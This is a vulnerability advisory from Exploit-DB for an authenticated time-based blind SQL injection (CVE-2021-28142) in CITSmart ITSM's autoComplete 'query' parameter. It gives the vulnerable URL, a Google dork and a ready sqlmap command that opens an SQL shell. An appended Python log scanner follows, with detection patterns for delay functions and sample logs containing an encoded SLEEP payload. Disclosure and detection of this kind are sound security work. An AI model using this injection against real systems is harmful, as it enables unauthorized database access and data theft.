CITSmart ITSM 9.1.2.27 – ‘query’ Time-based Blind SQL Injection (Authenticated)

  • Author: skysbsb
    Date: 2021-04-14
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/49763/
# Exploit Title: CITSmart ITSM 9.1.2.27 - 'query' Time-based Blind SQL Injection (Authenticated)
# Google Dork: "citsmart.local"
# Date: 11/03/2021
# Exploit Author: skysbsb
# Vendor Homepage: https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html
# Version: < 9.1.2.28
# CVE : CVE-2021-28142

To exploit this flaw it is necessary to be authenticated.

Vulnerable URL:
https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale
Vulnerable parameter: query

Sqlmap usage:
sqlmap -u "https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale" --cookie 'JSESSIONID=xxx' --time-sec 1 --prefix "')" --suffix "AND ('abc%'='abc" --sql-shell

Affected versions: < 9.1.2.28
Fixed versions: >= 9.1.2.28

The vendor has acknowledged this vulnerability in ticket 11216 (https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html).
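As an added defensive example (not part of the advisory or of CITSmart's own code), the following Python scans web-server access-log lines for requests to the autoCompletePortal.load endpoint whose `query` parameter carries a SQL delay function or the quote-closing boundary that the sqlmap `--prefix "')"` / `--suffix "AND ('abc%'='abc"` above produces, and marks those that also took unusually long to answer. The access-log field layout (response time in milliseconds as the last field) and the sample log lines are assumptions constructed for this example.

```python
# Detection helper for the CITSmart autoCompletePortal blind SQLi (added example).
import re
from urllib.parse import urlsplit, parse_qs

VULN_PATH = "/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load"
VULN_PARAM = "query"

# Delay primitives, and the "')" + boolean-operator boundary used by the advisory's sqlmap prefix/suffix.
DELAY_RE = re.compile(r"(?i)\b(?:sleep|pg_sleep|benchmark)\s*\(|waitfor\s+delay")
BOUNDARY_RE = re.compile(r"(?i)'\)\s*(?:and|or)\b.*\(")

# Assumed access-log shape: client ident user [time] "request" status bytes elapsed_ms
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]+" (\d{3}) \S+ (\d+)$')


def inspect_request(target, elapsed_ms=0, slow_ms=1000):
    parts = urlsplit(target)
    if not parts.path.endswith(VULN_PATH):
        return []
    # parse_qs percent-decodes the value, so the patterns see the SQL as the backend would.
    value = parse_qs(parts.query, keep_blank_values=True).get(VULN_PARAM, [""])[0]
    reasons = []
    if DELAY_RE.search(value):
        reasons.append("delay_function")
    if BOUNDARY_RE.search(value):
        reasons.append("quote_boundary")
    # A slow response only corroborates a probe; on its own it is just a slow autocomplete.
    if reasons and elapsed_ms >= slow_ms:
        reasons.append("slow_response")
    return reasons


def scan_log(lines, slow_ms=1000):
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _ts, _method, target, _status, elapsed = m.groups()
        reasons = inspect_request(target, int(elapsed), slow_ms)
        if reasons:
            hits.append((client, target, reasons))
    return hits


# Constructed sample lines (not real traffic): normal lookup, delay probe, boundary-only probe, unrelated path.
SAMPLE_LOG = [
    '10.0.0.5 - - [14/Apr/2021:10:00:01 +0000] "GET /citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale HTTP/1.1" 200 412 35',
    '10.0.0.9 - - [14/Apr/2021:10:00:07 +0000] "GET /citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale%27%29%20AND%20SLEEP%281%29%20AND%20%28%27abc%25%27%3D%27abc HTTP/1.1" 200 412 1042',
    '10.0.0.9 - - [14/Apr/2021:10:00:09 +0000] "GET /citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale%27%29%20AND%20%28%27abc%25%27%3D%27abc HTTP/1.1" 200 412 40',
    '10.0.0.7 - - [14/Apr/2021:10:00:12 +0000] "GET /citsmart/pages/login.load?query=sleep HTTP/1.1" 200 80 20',
]
```

`scan_log(SAMPLE_LOG)` flags only the two 10.0.0.9 requests; the benign lookup and the unrelated path are ignored even though the latter contains the word "sleep".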